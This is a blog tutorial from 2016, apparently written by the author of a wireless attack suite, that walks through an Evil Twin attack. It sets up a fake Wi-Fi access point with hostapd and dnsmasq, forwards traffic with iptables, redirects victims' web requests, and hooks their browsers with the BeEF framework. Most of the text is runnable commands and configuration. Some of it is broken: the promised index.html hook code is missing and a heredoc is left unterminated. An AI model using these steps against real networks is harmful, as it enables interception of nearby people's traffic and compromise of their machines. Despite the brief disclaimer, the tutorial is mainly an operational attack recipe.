August 2, 2016
Using Wireless Evil Twin and BeEF to Compromise Target Machines
August 2, 2016
I'm the author of Infernal Wireless Suite. Today, I'd like to teach you how to perform an Evil Twin attack, along with utilizing the BeEF Framework to compromise a target machine during penetration tests or red team exercises.
First thing first, what is an Evil Twin attack?
An Evil Twin attack is when you attempt to impersonate a wireless access point and lure probing devices to connect to you. This way, you're acting as a legitimate access point and proving internet through your own internet access interface. Any victim connected to your fake access point would be subject to data interception. More information can be found here: https://en.wikipedia.org/wiki/Evil_twin_(wireless_networks)
Second, what is the BeEF Framework ?
Now, as the title implies, I'd like to show you one of the attack vectors I implemented in my tool, infernal wireless, and I wanted to show you how to do it manually.
This tutorial is only for educational and professional use.
Please don't use for illegal purposes!!
My network cards are as follows:
wlan0 - wireless Interface name, yours might be different, replace if needed
eth0 - internet facing interface name, yours might be different, replace if needed
Preferred OS: Kali Linux
Install: hostapd, dnsmasq, BeeF Framework
First, we need to create a fake Access Point with a desired name.
Step 1: Create a configuration file for hostapd
Type the following into a free_AP.conf and save it.
interface=wlan0 # (change this if it differs from yours)
ssid= <fakeAPName> # you access Point name
hostapd free_AP.conf &
Step 2: Configure DNS Settings:
From a command prompt, execute below:
sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd
cat <<EOF > /etc/dnsmasq.conf
interface=wlan0 # this is your wireless interface, change if different
service dnsmasq start
Step 3 - Set up NAT Table:
Execute the following from the command line:
ifconfig wlan0 up
ifconfig wlan0 10.0.0.1/24
iptables -t nat -F
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward
Step 4 - Set up BeEF and HTTP Service:
From command line or by any other means you have, enable HTTP Service:
Create index.html under your root folder .i.e /var/www/html/index.html and write the code below:
Step 5 - Another iptable set up:
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80
iptables -t nat -A POSTROUTING -j MASQUERADE
Step 6 - Launch BeEF Framework:
From the command prompt, execute this:
firefox http://127.0.0.1:3000/ui/panel &
Login credentials are beef:beef
Now, it's just a matter of waiting till someone connects to your network.
The demo video can be seen here: https://www.youtube.com/watch?v=pVY5azLJMPY
Now, wait. If you want to use the automated too that I created, you may download here: https://github.com/entropy1337/infernal-twin